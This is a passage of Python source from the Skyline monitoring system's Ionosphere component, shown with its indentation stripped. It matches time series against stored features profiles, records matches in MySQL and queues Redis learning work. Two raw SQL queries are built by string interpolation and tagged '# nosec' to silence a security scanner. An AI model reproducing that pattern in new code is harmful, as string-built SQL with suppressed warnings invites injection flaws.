lower_range_not_same = True
try:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_not_same = False
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
except:
lower_range_not_same = True
if min_fp_value and min_anomalous_value and lower_range_not_same:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
else:
lower_min_fp_value = int(min_fp_value - (min_fp_value * range_tolerance))
upper_min_fp_value = int(min_fp_value + (min_fp_value * range_tolerance))
if int(min_anomalous_value) in range(lower_min_fp_value, upper_min_fp_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(min_fp_value),
str(min_anomalous_value),
str(range_tolerance_percentage)))
if not lower_range_similar:
logger.info('lower range of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(min_fp_value), str(min_anomalous_value)))
upper_range_not_same = True
try:
if int(max_fp_value) == int(max_anomalous_value):
upper_range_not_same = False
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(max_fp_value), str(max_anomalous_value)))
except:
upper_range_not_same = True
if max_fp_value and max_anomalous_value and lower_range_similar and upper_range_not_same:
# @added 20180717 - Task #2446: Optimize Ionosphere
# Feature #2404: Ionosphere - fluid approximation
# On low values such as 1 and 2, the range_tolerance
# should be adjusted to account for the very small
# range. TODO
lower_max_fp_value = int(max_fp_value - (max_fp_value * range_tolerance))
upper_max_fp_value = int(max_fp_value + (max_fp_value * range_tolerance))
if int(max_anomalous_value) in range(lower_max_fp_value, upper_max_fp_value):
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(max_fp_value), str(max_anomalous_value),
str(range_tolerance_percentage)))
else:
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(max_fp_value), str(max_anomalous_value)))
if lower_range_similar and upper_range_similar:
range_similar = True
else:
logger.info('the ranges of fp_id_metric_ts and anomalous_timeseries differ significantly Min-Max scaling will be skipped')
minmax_fp_ts = []
# if fp_id_metric_ts:
if range_similar:
if LOCAL_DEBUG:
logger.debug('debug :: creating minmax_fp_ts from minmax scaled fp_id_metric_ts')
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
x_np = np.asarray(minmax_fp_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_fp_ts.append([ts[0], v])
logger.info('minmax_fp_ts list populated with the minmax scaled time series with %s data points' % str(len(minmax_fp_ts)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not minmax scale fp id %s time series for %s' % (str(fp_id), str(base_name)))
if not minmax_fp_ts:
logger.error('error :: minmax_fp_ts list not populated')
minmax_anomalous_ts = []
if minmax_fp_ts:
# Only process if they are approximately the same length
minmax_fp_ts_values_count = len(minmax_fp_ts)
if minmax_fp_ts_values_count - anomalous_ts_values_count in range(-14, 14):
try:
minmax_anomalous_values = [x2[1] for x2 in anomalous_timeseries]
x_np = np.asarray(minmax_anomalous_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_anomalous_ts.append([ts[0], v])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not minmax scale current time series anomalous_timeseries for %s' % (str(fp_id), str(base_name)))
if len(minmax_anomalous_ts) > 0:
logger.info('minmax_anomalous_ts is populated with %s data points' % str(len(minmax_anomalous_ts)))
else:
logger.error('error :: minmax_anomalous_ts is not populated')
else:
logger.info('minmax scaled check will be skipped - anomalous_ts_values_count is %s and minmax_fp_ts is %s' % (str(anomalous_ts_values_count), str(minmax_fp_ts_values_count)))
minmax_fp_ts_csv = '%s/fpid.%s.%s.minmax_fp_ts.tsfresh.input.std.csv' % (
settings.SKYLINE_TMP_DIR, str(fp_id), base_name)
minmax_fp_fname_out = minmax_fp_ts_csv + '.transposed.csv'
anomalous_ts_csv = '%s/%s.%s.minmax_anomalous_ts.tsfresh.std.csv' % (
settings.SKYLINE_TMP_DIR, metric_timestamp, base_name)
anomalous_fp_fname_out = anomalous_ts_csv + '.transposed.csv'
tsf_settings = ReasonableFeatureExtractionSettings()
tsf_settings.disable_progressbar = True
minmax_fp_features_sum = None
minmax_anomalous_features_sum = None
if minmax_anomalous_ts and minmax_fp_ts:
if LOCAL_DEBUG:
logger.debug('debug :: analyzing minmax_fp_ts and minmax_anomalous_ts')
if not os.path.isfile(minmax_fp_ts_csv):
if LOCAL_DEBUG:
logger.debug('debug :: creating %s from minmax_fp_ts' % minmax_fp_ts_csv)
datapoints = minmax_fp_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
except: # nosec
continue
if LOCAL_DEBUG:
if len(converted) > 0:
logger.debug('debug :: converted is populated')
else:
logger.debug('debug :: error :: converted is not populated')
for ts, value in converted:
try:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(minmax_fp_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not write to file %s' % (str(minmax_fp_ts_csv)))
else:
logger.info('file found %s, using for data' % minmax_fp_ts_csv)
if not os.path.isfile(minmax_fp_ts_csv):
logger.error('error :: file not found %s' % minmax_fp_ts_csv)
else:
logger.info('file exists to create the minmax_fp_ts data frame from - %s' % minmax_fp_ts_csv)
try:
df = pd.read_csv(minmax_fp_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created data frame from %s' % (str(minmax_fp_ts_csv)))
try:
df_features = extract_features(
df, column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, feature_extraction_settings=tsf_settings)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created df_features from %s' % (str(minmax_fp_ts_csv)))
# Create transposed features csv
if not os.path.isfile(minmax_fp_fname_out):
# Transpose
df_t = df_features.transpose()
df_t.to_csv(minmax_fp_fname_out)
else:
if LOCAL_DEBUG:
logger.debug('debug :: file exists - %s' % minmax_fp_fname_out)
try:
# Calculate the count and sum of the features values
df_sum = pd.read_csv(
minmax_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum.columns = ['feature_name', 'value']
df_sum['feature_name'] = df_sum['feature_name'].astype(str)
df_sum['value'] = df_sum['value'].astype(float)
minmax_fp_features_count = len(df_sum['value'])
minmax_fp_features_sum = df_sum['value'].sum()
logger.info('minmax_fp_ts - features_count: %s, features_sum: %s' % (str(minmax_fp_features_count), str(minmax_fp_features_sum)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created df_sum from %s' % (str(minmax_fp_fname_out)))
if minmax_fp_features_count > 0:
if LOCAL_DEBUG:
logger.debug('debug :: minmax_fp_features_count of the minmax_fp_ts is %s' % str(minmax_fp_features_count))
else:
logger.error('error :: minmax_fp_features_count is %s' % str(minmax_fp_features_count))
if not os.path.isfile(anomalous_ts_csv):
datapoints = minmax_anomalous_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
except: # nosec
continue
for ts, value in converted:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(anomalous_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
df = pd.read_csv(anomalous_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
df_features_current = extract_features(
df, column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, feature_extraction_settings=tsf_settings)
# Create transposed features csv
if not os.path.isfile(anomalous_fp_fname_out):
# Transpose
df_t = df_features_current.transpose()
df_t.to_csv(anomalous_fp_fname_out)
# Calculate the count and sum of the features values
df_sum_2 = pd.read_csv(
anomalous_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum_2.columns = ['feature_name', 'value']
df_sum_2['feature_name'] = df_sum_2['feature_name'].astype(str)
df_sum_2['value'] = df_sum_2['value'].astype(float)
minmax_anomalous_features_count = len(df_sum_2['value'])
minmax_anomalous_features_sum = df_sum_2['value'].sum()
logger.info('minmax_anomalous_ts - minmax_anomalous_features_count: %s, minmax_anomalous_features_sum: %s' % (
str(minmax_anomalous_features_count),
str(minmax_anomalous_features_sum)))
if minmax_fp_features_sum and minmax_anomalous_features_sum:
percent_different = None
try:
fp_sum_array = [minmax_fp_features_sum]
calc_sum_array = [minmax_anomalous_features_sum]
percent_different = 100
sums_array = np.array([minmax_fp_features_sum, minmax_anomalous_features_sum], dtype=float)
calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
percent_different = calc_percent_different[0]
logger.info('percent_different between minmax scaled features sums - %s' % str(percent_different))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate percent_different from minmax scaled features sums')
if percent_different:
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
minmax_not_anomalous = True
logger.info('minmax scaled common features sums are almost equal, not anomalous')
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
minmax_not_anomalous = True
# log
logger.info('not anomalous - minmax scaled features profile match - %s - %s' % (base_name, str(minmax_not_anomalous)))
logger.info(
'minmax scaled calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
(str(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR),
str(fp_id), str(percent_different)))
if minmax_not_anomalous:
not_anomalous = True
minmax = 1
# Created time series resources for graphing in
# the matched page
# Clean up
if minmax_check:
try:
clean_file = anomalous_ts_csv
if os.path.isfile(anomalous_ts_csv):
self.remove_metric_check_file(str(anomalous_ts_csv))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_ts_csv file to clean up')
try:
clean_file = anomalous_fp_fname_out
if os.path.isfile(anomalous_fp_fname_out):
self.remove_metric_check_file(str(anomalous_fp_fname_out))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_fp_fname_out file to clean up')
# END - Feature #2404: Ionosphere - fluid approximation
if not_anomalous:
self.not_anomalous.append(base_name)
# update matched_count in ionosphere_table
matched_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update matched details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update matched details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(matched_count=ionosphere_table.c.matched_count + 1,
last_matched=matched_timestamp))
connection.close()
logger.info('updated matched_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update matched_count and last_matched for %s ' % str(fp_id))
# @added 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched update
# @modified 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update ionosphere_matched for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update ionosphere_matched for %s' % (str(fp_id)))
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_matched_table meta for %s' % base_name)
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
if minmax_not_anomalous == 1:
minmax_fp_features_sum = float(minmax_fp_features_sum)
minmax_fp_features_count = int(minmax_fp_features_count)
minmax_anomalous_features_sum = float(minmax_anomalous_features_sum)
minmax_anomalous_features_count = int(minmax_anomalous_features_count)
else:
minmax_fp_features_sum = 0
minmax_fp_features_count = 0
minmax_anomalous_features_sum = 0
minmax_anomalous_features_count = 0
try:
connection = engine.connect()
# @modified 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added all_calc_features_sum, all_calc_features_count,
# sum_calc_values, common_features_count, tsfresh_version
ins = ionosphere_matched_table.insert().values(
fp_id=int(fp_id),
metric_timestamp=int(metric_timestamp),
all_calc_features_sum=float(all_calc_features_sum),
all_calc_features_count=len(all_calc_features_sum_list),
sum_common_values=float(sum_calc_values),
common_features_count=int(relevant_calc_feature_values_count),
tsfresh_version=str(tsfresh_version),
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
minmax=minmax,
minmax_fp_features_sum=minmax_fp_features_sum,
minmax_fp_features_count=minmax_fp_features_count,
minmax_anomalous_features_sum=minmax_anomalous_features_sum,
minmax_anomalous_features_count=minmax_anomalous_features_count,
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_count=fp_count, fp_checked=fp_checked)
result = connection.execute(ins)
connection.close()
new_matched_id = result.inserted_primary_key[0]
# @modified 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax
if minmax == 0:
logger.info('new ionosphere_matched id: %s' % str(new_matched_id))
else:
logger.info('new minmax scaled ionosphere_matched id: %s' % str(new_matched_id))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: could not update ionosphere_matched for %s with with timestamp %s' % (
str(fp_id), str(metric_timestamp)))
# @added 20170331 - Task #1988: Review - Ionosphere layers - always show layers
# Feature #1960: ionosphere_layers
# Added mirror functionality of the layers_id_matched_file
# for feature profile matches too as it has proved useful
# in the frontend with regards to training data sets being
# matched by layers and can do the same for in the frontend
# training data for feature profile matches too.
if not_anomalous:
profile_id_matched_file = '%s/%s.profile_id_matched.fp_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(profile_id_matched_file):
try:
write_data_to_file(skyline_app, profile_id_matched_file, 'w', str(fp_id))
logger.info('added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Stop on the first match
break
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.testing.assert_almost_equal.html
# @added 20161214 - Add a between timeframe option, e.g. if
# fp match, only see this as not anomalous if hour (and or min)
# is between x and y - handle rollovers, cron log archives, etc.
logger.info('debug :: %s is a features profile for %s' % (str(fp_id), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# If this is an ionosphere_learn check them we handle it before
# the others and exit and ionosphere_learn uses the Redis work
# queue. Here we go! Learn!
if added_by == 'ionosphere_learn':
if not_anomalous:
logger.info('an ionosphere_learn metric has been found to be not anomalous before')
# @added 20170607 - Feature #2010: Ionosphere learn - rate limiting profile learning
learning_rate_limited = False
now = int(time())
rate_limit_timestamp = now - 3600
rate_limit_datetime = datetime.fromtimestamp(rate_limit_timestamp)
f = '%Y-%m-%d %H:%M:%S'
after_datetime = rate_limit_datetime.strftime(f)
try:
connection = engine.connect()
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
result = connection.execute(
'SELECT * FROM ionosphere WHERE metric_id=%s AND created_timestamp > \'%s\' AND generation > 1' % (str(metrics_id), str(after_datetime))) # nosec
for row in result:
last_full_duration = row['full_duration']
if int(full_duration) <= int(last_full_duration):
learning_rate_limited = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: determining whether learning should be rate limited')
if learning_rate_limited:
logger.info('learning currently dynamically rate limited on %s' % str(base_name))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('learning is not currently rate limited on %s' % str(base_name))
# @added 20170605 - Bug #2038: Ionosphere learn parent generation incorrect
# Determine generation of the matched fp not the last in the
# list
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT generation FROM ionosphere WHERE id=%s' % str(fp_id) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
matched_fp_generation = int(row['generation'])
connection.close()
logger.info(
'determined matched fp_id %s is a generation %s profile' % (
str(fp_id), str(matched_fp_generation)))
current_fp_generation = matched_fp_generation
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine generation from ionosphere table for fp id %s' % str(fp_id))
logger.info(
'ionosphere_learn metric matches the generation %s features profile id %s - %s' % (
str(current_fp_generation), str(fp_id), base_name))
# Added Redis to work_set, learn will then go off and create
# the features profile with the parent training data if
# less than max_generations, although ionosphere_learn
# should not should Ionosphere any work if the result would
# be greater than max_generations
logger.info('adding work item to Redis set ionosphere.learn.work')
ionosphere_job = 'learn_fp_learnt'
work_deadline = 'Soft'
try:
logger.info(
'LEARNT :: adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to create a learnt features profile' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)])
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to make a learn features profile later' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly. We only evaluate
# the Ionosphere layer algorithms after Skyline has had an
# an opportunity to match the original and learnt features
# profiles. This enables the original, evolutionary,
# generations based learning to be continually evaluated.
# This needs to happen for any future implemenation of
# Feature #1888: Ionosphere learn - evolutionary maturity forget
logger.info('layers algorithms check')
check_layers_algorithms = False
if not not_anomalous:
check_layers_algorithms = True
if added_by == 'ionosphere_learn':
check_layers_algorithms = False
logger.info('ionosphere_learn - layers algorithms check - False')
else:
logger.info('layers algorithms check - True, %s layers to be checked' % str(fp_layers_count))
else:
logger.info('a features profile matched as not_anomalous - layers algorithms check - False')
if check_layers_algorithms and fp_layers_present:
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
mirage_full_duration_json_file = '%s/%s.mirage.redis.%sh.json' % (
metric_training_data_dir, base_name,
str(int(full_duration_in_hours)))
if os.path.isfile(mirage_full_duration_json_file):
full_duration_json_file = mirage_full_duration_json_file
else:
full_duration_json_file = '%s/%s.json' % (metric_training_data_dir, base_name)
anomalous_timeseries = None
if os.path.isfile(full_duration_json_file):
logger.info('full duration ts json available for layers check - %s' % (full_duration_json_file))
try:
# Read the timeseries json file
with open((full_duration_json_file), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
anomalous_timeseries = literal_eval(timeseries_array_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not load json for layers check - %s' % (base_name))
logger.info('data points surfaced for layers check - %s' % (len(anomalous_timeseries)))
else:
logger.error('error :: full duration ts json for layers was not found - %s' % (full_duration_json_file))
matched_layers_id = None
for layers_id in fp_layers_ids:
if not_anomalous:
logger.info('checking layers_id %s - %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not_anomalous:
logger.info('skipping checking layers_id %s - %s layers profiles of %s possible layers as layer id %s already matched' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count), str(matched_layers_id)))
continue
if int(layers_id) != 0:
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked += 1
layers_checked_count += 1
# Get the layers algorithms and run then on the timeseries
# @modified 20170307 - Feature #1960: ionosphere_layers
# Use except on everything, remember how fast Skyline can iterate
try:
self.layers_checked.append(layers_id)
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries)
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked)
not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked_count)
if not_anomalous:
matched_layers_id = layers_id
except:
logger.error(traceback.format_exc())
logger.error('error :: run_layer_algorithms failed for layers_id - %s' % (str(layers_id)))
if not_anomalous:
logger.info('not_anomalous :: layers_id %s was matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
else:
logger.info('still anomalous :: layers_id %s was NOT matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not not_anomalous:
logger.info('anomalous - no features profiles layers were matched - %s' % base_name)
# @added 20170308 - Feature #1960: ionosphere_layers
# Feature #1854: Ionosphere learn
# A create a layer_id matched txt file in the training_data dir
# to advise the operator if a training_data set has been matched
# by a layer. Further below if app is not ionosphere_learn a
# 'learn_fp_generation' ionosphere_job is added so ionosphere_learn
# can still try and learning from the existing features profiles
# that exist even if a layer matched as not_anomalous.
if not_anomalous:
layers_id_matched_file = '%s/%s.layers_id_matched.layers_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(layers_id_matched_file):
try:
write_data_to_file(skyline_app, layers_id_matched_file, 'w', str(matched_layers_id))
logger.info('added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
else:
logger.info('no layers algorithm check required')
# Ionosphere layers DONE
if not not_anomalous:
logger.info('anomalous - no feature profiles were matched - %s' % base_name)
# @added 20170116 - Feature #1854: Ionosphere learn
# If this is an ionosphere_learn check an Ionosphere alert will
# not be sent back to Analyzer, Mirage or the ionosphere.learn.work
# Redis set. We exit, work is done.
if added_by == 'ionosphere_learn':
logger.info('ionosphere_learn check complete - %s' % base_name)
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
self.anomalous_metrics.append(base_name)
# Send to panorama as Analyzer and Mirage will only alert on the
# anomaly, they will not push it to Panorama
if settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed is single quoted intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panaroma_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(anomalous_value), str(int(from_timestamp)),
str(int(metric_timestamp)), str(settings.ALGORITHMS),
str(triggered_algorithms), skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panaroma_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
base_name)
try:
write_data_to_file(
skyline_app, panaroma_anomaly_file, 'w',
panaroma_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
self.sent_to_panorama.append(base_name)
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
logger.info(traceback.format_exc())
# alert ... hmmm the harder part, maybe not all the resources
# are already created, so just determining ALERTS and firing a
# trigger_alert (pull in alerter.py and mirage_alerters.py?)
# OR send back to app via Redis
# @modified 20170116 - Feature #1854: Ionosphere learn
# Only do the cache_key if not ionosphere_learn
if added_by != 'ionosphere_learn':
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
try:
self.redis_conn.setex(
cache_key, 300,
[float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration])
logger.info(
'add Redis alert key - %s - [%s, \'%s\', %s, %s]' %
(cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
str(triggered_algorithms)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s]' %
(cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
str(triggered_algorithms)))
# @added 20170116 - Feature #1854: Ionosphere learn
# Added an ionosphere_learn job for the timeseries that did not
# match any profiles. Here we go! Learn!
if added_by != 'ionosphere_learn':
ionosphere_job = 'learn_fp_generation'
logger.info(
'adding an ionosphere_learn %s job for the timeseries that did not match any profiles - %s' % (
ionosphere_job, base_name))
try:
logger.info(
'adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None])
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
def run(self):
"""
Called when the process intializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
logger.info('removing %s' % skyline_app_logwait)
os.remove(skyline_app_logwait)
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to Redis')
except:
logger.error('error :: cannot connect to redis at socket path %s' % (
settings.REDIS_SOCKET_PATH))
sleep(30)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
if settings.REDIS_PASSWORD:
self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
continue
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# purge_old_data_dirs after every check file run, this takes less
# than a second and keeps the purging somewhat consistent with
# input rate.
try:
logger.info('purging any old training data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.print_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' %
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
# @added 20170110 - Feature #1854: Ionosphere learn
# purge_old_data_dirs learn data
if settings.IONOSPHERE_LEARN:
try:
logger.info('purging any old learning data')
self.purge_old_data_dirs(
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs learn - %s' % traceback.print_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' %
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
# @added 20170916 - Feature #1996: Ionosphere - matches page
# Create the ionosphere_summary_memcache_object
# @modified 20180103 - Feature #1996: Ionosphere - matches page
# The ionosphere_summary_list memcache object is not managed in
# ionosphere.py and was an artefact of some dev work that may
# resume at some point
# if settings.MEMCACHE_ENABLED:
# try:
# logger.info('updating the ionosphere_summary_memcache_object')
